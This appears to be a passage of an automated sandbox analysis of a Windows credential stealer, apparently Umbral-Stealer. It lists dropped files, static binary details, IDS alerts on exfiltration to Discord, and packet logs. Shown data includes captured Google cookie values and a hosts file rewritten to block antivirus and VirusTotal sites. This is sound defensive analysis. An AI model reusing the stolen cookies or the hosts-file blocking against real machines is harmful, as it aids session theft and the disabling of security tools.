                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gin3quiq.xg5.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ioz43aw2.gaf.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lmhfkpgk.zkd.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_npzhbl3l.d3l.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p24l5imw.z3o.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p34p2ss2.u15.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p51h10bs.4ee.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pqs4zq3y.edj.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ucyrlcws.sxi.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\aixZkwdHKuVVdwi.ligma

                                            Download File
                                            Process:C:\Users\user\Desktop\IDLBk4XMUa.exe
                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                            Category:dropped
                                            Size (bytes):655901
                                            Entropy (8bit):7.997824442733044
                                            Encrypted:true
                                            SSDEEP:12288:N4QsnxZuo0UBcRHuPWCN+e8q080FLW//MpjGoG/Qton:6t7nQHUtzGY/U7G4tS
                                            MD5:E757A409EB6D1A95F9D4A413630BB390
                                            SHA1:8F8ED16831D1C6595C1D187D81B986CEE9A871B4
                                            SHA-256:6F8019C825B4D4DD83FD53392B22EC75742B2DF9A7F413138082B1C0744A50DD
                                            SHA-512:0667D8FE05E58E2F3BA13C9D0E4996E9636A238F6F31E2467FF0F5D993DDD4C0D3099E4906E8DE6E4445EAC1EB32D60156899696AFC17AFE3E51B0E837AA8E6A
                                            Malicious:false
                                            Preview:PK........lS.Y.\"n....!...#...Browsers\Cookies\Chrome Cookies.txt}.Kr.0...u..(..D.]P...D.P.8T............i.:......I.o.P._:@....e.0*o....z@..... . [....B..D.....8......N.t.2....\j.8...5T_.h?$m(........?^..O.U..~NEu.>..4&.6HY.L~.....H..^?.P..1....|..i.v..|9.5.J^..*....K.q...9*....!.].Z.....R._PK........lS.YM..y....}I......Display\Display.pngl.y8.........2.D....L..d..B...J..e.E*k.!K.!d'..."DF..oa.XF.m.~.......s..?.8.......z<..".,..............d........D.>{...0...{$...y.^....8....O.yll...._~.@....p.ob.{..2+...[....k.."...\.Y3..=.....g..;"..gT,$f.HV.V...O......Vp|....gEn.<+Z.......O{4.T).S..+<.5$..5./U..n.5..{....~.M.{`..iKf..$..~..-D.j'.>%.q.D..DE....A.W..]./z........6.......'.........s...S...r0..,?..v-.c......0.^._....2!'%.m@H}.....t....C...W&H:}..-...O.........I..X..k..K...p...{..7...'&.&5..".c!u.yj..F8.a..W...z..6..)...N...f.-..i...|..?h.o...1...W.L.8.Wg}....+....V.FVO7c..-.S.......s.....Su\..=5'.......;.M...l..k&. ...-.w...)_..9...*k....w.

                                            C:\Users\user\AppData\Local\Temp\hfzU4W9BRA18JhD

                                            Download File
                                            Process:C:\Users\user\Desktop\IDLBk4XMUa.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                            Category:dropped
                                            Size (bytes):20480
                                            Entropy (8bit):0.848598812124929
                                            Encrypted:false
                                            SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
                                            MD5:9664DAA86F8917816B588C715D97BE07
                                            SHA1:FAD9771763CD861ED8F3A57004C4B371422B7761
                                            SHA-256:8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
                                            SHA-512:E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
                                            Malicious:false
                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Temp\nlQT11xVcC5SHaK\Browsers\Cookies\Chrome Cookies.txt

                                            Download File
                                            Process:C:\Users\user\Desktop\IDLBk4XMUa.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):289
                                            Entropy (8bit):5.865375252169314
                                            Encrypted:false
                                            SSDEEP:6:Pk3rsLgxbh+3r4wyXfaaW3UnhzrWgOsH6/8hwDFI0BFOqv5:c7JH+74xva3UhyL/8ObW0
                                            MD5:49EC633D95953041A44FF47D64F82A19
                                            SHA1:EA9BD5B1F902BBFC4EC24A7AC5E99EF72436A2F4
                                            SHA-256:3E64F1CCD635E18E72EF1A8F74640450AA7F2EC52529F28C03F473ECC5988A8F
                                            SHA-512:D6A627F441FA70A81F8D3BDBFA63DA0F111FE83EC359321EC281C7D1569382A303091693625AB3B78B1EA2FB9068DCFFAE61F13FA24C6106B1F5183442FB4DF9
                                            Malicious:false
                                            Preview:.google.com.TRUE./.FALSE.13343557341976489.1P_JAR.2023-10-05-07...google.com.TRUE./.FALSE.13356776540976533.NID.511=nNadqW9uTcY0OP6I3afnr71o6EzaYLsdpW4UEYN3vYq_rbRrNFxM1jozPGuhjORBZKKMz2tdDpVe7dNuTWp4CyK-zt5Is6wVElveWAfKQgwNJiKKtXHCCCmrlgzZTl5CiKjTeA2iQqf6zlRK2h8wg1hVpIsWsaKqaWJyHMPF3JA..

                                            C:\Users\user\AppData\Local\Temp\nlQT11xVcC5SHaK\Display\Display.png

                                            Download File
                                            Process:C:\Users\user\Desktop\IDLBk4XMUa.exe
                                            File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                            Category:dropped
                                            Size (bytes):674173
                                            Entropy (8bit):7.924232456527042
                                            Encrypted:false
                                            SSDEEP:12288:Etv6+67htETHcVUGmnP0Ata923LbuaVaTVb/DUG68luun0ci6czg:EB6FIuiP/g03HuaVEdUNxY0t6Eg
                                            MD5:FD4F4C36D7FEC52F9F9BFC55C72F6BBF
                                            SHA1:5D5458AF6E349EE81CAE557C7C2733060FCB58C2
                                            SHA-256:617B4859BC3960A308660CC9DECBB4F1DCAEF8CF46BEF477E402BACBA2A93C61
                                            SHA-512:671EE082636E73F596992DE5D897686BF4040CF970F94E5CC85E61541644B1E94F361C513B342A3DC8AD9E80E0861E21CE05385F1654650415F117F5B7670EE2
                                            Malicious:false
                                            Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..y.mU........l..2......Dq...|.G...J].5.("X..X#*R.....PD1.(...P...PJ.R....7.1.o.....j..9...1z.c...........9...dy....!.NI.h..Y.<?....C.....3..N.....'<....n.^.d!.t...........0Wl...q.~i~t...y1u\L..O...}b..Y..HL.#..H..t.....;.#.....5..?..=6i:.?:.S..;..>.25O..yx^L}....S.N..'.:.S..O<0o:...e...TS......7..........3....m...=.....D..k.~<.S.....h ..S..W.{...t..{R.<.....w.f...J..;.8..w.L......j.....bK...LY..b..........6..z..o..e...f.y.{.-U..7WK.r[..[g1..[2So.9..|...../)X...k....S.ySb...e|~.O...L...~5K.O...7...X+..7..zj....7.Z-./.........0...w....n.e..P-}c..'..b...{]_M.y]......5yN|...wK1....K...Z.j..q).T...4..zU..N.tw.:...J..XB...~m.t.tn....Rn.3.].jc+...Z.W:7..q..i.n.....;]...]........WT.......>+.......~uf.n.s........g].~...\.G..[.s:..t.N?..r=..;.|B../.L.....&......u..O.n.>...WS.\...vH.7A...em.s.a...\...b/.....Rn.?.Z/.&.muY5.u..4'.:A.<.[.C.....3.lvq....\....S.>..".

                                            C:\Users\user\AppData\Local\Temp\oFhYVgGK4pGWvb1

                                            Download File
                                            Process:C:\Users\user\Desktop\IDLBk4XMUa.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                            Category:dropped
                                            Size (bytes):51200
                                            Entropy (8bit):0.8746135976761988
                                            Encrypted:false
                                            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                            MD5:9E68EA772705B5EC0C83C2A97BB26324
                                            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                            Malicious:false
                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Temp\tlf64c2jHarKcpu

                                            Download File
                                            Process:C:\Users\user\Desktop\IDLBk4XMUa.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                            Category:dropped
                                            Size (bytes):40960
                                            Entropy (8bit):0.8553638852307782
                                            Encrypted:false
                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                            Malicious:false
                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Windows\System32\drivers\etc\hosts

                                            Download File
                                            Process:C:\Users\user\Desktop\IDLBk4XMUa.exe
                                            File Type:ASCII text, with CRLF, LF line terminators
                                            Category:dropped
                                            Size (bytes):2223
                                            Entropy (8bit):4.573013811987098
                                            Encrypted:false
                                            SSDEEP:48:vDZhyoZWM9rU5fFc7s9PI8A+VyUq8UwWsnNhUm:vDZEurK988TwU0wWsn/
                                            MD5:C9901CB0AE22A9ABBD192B692AE4E2EB
                                            SHA1:12976AC7024E5D1FF3FDF5E6A8251DC9C9205E39
                                            SHA-256:3865EE9FBAF4813772CADE7B42A2E8AA8248734DD92FA5498D49947295E16EE0
                                            SHA-512:E3E796F34E894C1B924B087CEC0CCA928BFD6FED71C462F30E79264EC3BF5353C434C69094FFB9EE0C3AD6DE694AA0B13B5490013AB1C28452C1CDC19C4F0E6F
                                            Malicious:true
                                            Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost...0.0.0.0 virustotal.com..0.0.0.0 www.virustotal.com..0.0.0.0 avast.com..0.0.0.0 www.avast.com..0.0.0.0 totalav.com..0.0.0.0 www.totalav.com..0.0.0.0 scanguard.com..0.0.0.0 www.

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):6.051659594908541
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                            • Windows Screen Saver (13104/52) 0.07%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            File name:IDLBk4XMUa.exe
                                            File size:235'008 bytes
                                            MD5:ae3713305401315a3b520e84fb786fe5
                                            SHA1:914bd258c204e4cddab9dc0dbfb9c7134659ad57
                                            SHA256:0933217d8ea84d9341154ecc34a3f231cf2ff0e70d67dbe190265c7e26b96cfb
                                            SHA512:ae29d0c4c9106dcfbd4a212968d7d8b87236c2f39ce37435d3a658fe1b42875e44cc65c98f818391a8051312811b51da747efef5fa347f3a053b58454bd1e155
                                            SSDEEP:6144:dloZM3fsXtioRkts/cnnK6cMlpGZ7lTwk7tiTlwsJtSb8e1mdi:/oZ1tlRk83MlpGZ7lTwk7tiTlwsJIH
                                            TLSH:9F346B4933B8CB17E25F8BBDD5B0548F87B1F143E90AF7CE1C8899E82411B42E949A57
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.a..........."...0.................. ........@.. ....................................`................................

                                            File Icon

                                            Icon Hash:00928e8e8686b000

                                            Static PE Info

                                            General

                                            Entrypoint:0x43aa9e
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x9C61056C [Wed Feb 19 18:54:36 2053 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                            Entrypoint Preview

                                            Instruction
                                            jmp dword ptr [00402000h]
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x3aa480x53.text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x3c0000x550.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x3e0000xc.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x3aa2c0x1c.text
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x20000x38aa40x38c00e33b8dd2fdda32a5da99caef7d0f5cdaFalse0.3988849118942731data6.0674971746640525IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rsrc0x3c0000x5500x600962661cf515c57234d66775c661dfadeFalse0.4134114583333333data4.575008625258809IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0x3e0000xc0x2000ba71f33e486e8552fc7ee8251bdd63dFalse0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_VERSION0x3c0a00x2c4data0.4449152542372881
                                            RT_MANIFEST0x3c3640x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                            Imports

                                            DLLImport
                                            mscoree.dll_CorExeMain

                                            Network Behavior

                                            Suricata IDS Alerts

                                            TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                            2024-08-05T14:58:58.214926+0200TCP2045593ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST)49707443192.168.2.7162.159.138.232
                                            2024-08-05T14:58:38.291208+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H4970580192.168.2.7208.95.112.1

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Aug 5, 2024 14:58:03.733750105 CEST4970080192.168.2.7208.95.112.1
                                            Aug 5, 2024 14:58:03.743948936 CEST8049700208.95.112.1192.168.2.7
                                            Aug 5, 2024 14:58:03.744040012 CEST4970080192.168.2.7208.95.112.1
                                            Aug 5, 2024 14:58:03.744220972 CEST4970080192.168.2.7208.95.112.1
                                            Aug 5, 2024 14:58:03.759335041 CEST8049700208.95.112.1192.168.2.7
                                            Aug 5, 2024 14:58:04.258070946 CEST8049700208.95.112.1192.168.2.7
                                            Aug 5, 2024 14:58:04.303088903 CEST4970080192.168.2.7208.95.112.1
                                            Aug 5, 2024 14:58:37.718220949 CEST4970580192.168.2.7208.95.112.1
                                            Aug 5, 2024 14:58:37.723102093 CEST8049705208.95.112.1192.168.2.7
                                            Aug 5, 2024 14:58:37.723192930 CEST4970580192.168.2.7208.95.112.1
                                            Aug 5, 2024 14:58:37.723392963 CEST4970580192.168.2.7208.95.112.1
                                            Aug 5, 2024 14:58:37.728836060 CEST8049705208.95.112.1192.168.2.7
                                            Aug 5, 2024 14:58:38.275398016 CEST8049705208.95.112.1192.168.2.7
                                            Aug 5, 2024 14:58:38.291208029 CEST4970580192.168.2.7208.95.112.1
                                            Aug 5, 2024 14:58:38.296509027 CEST8049705208.95.112.1192.168.2.7
                                            Aug 5, 2024 14:58:38.296569109 CEST4970580192.168.2.7208.95.112.1
                                            Aug 5, 2024 14:58:57.345340014 CEST49707443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:57.345362902 CEST44349707162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:57.345479965 CEST49707443192.168.2.7162.159.138.232
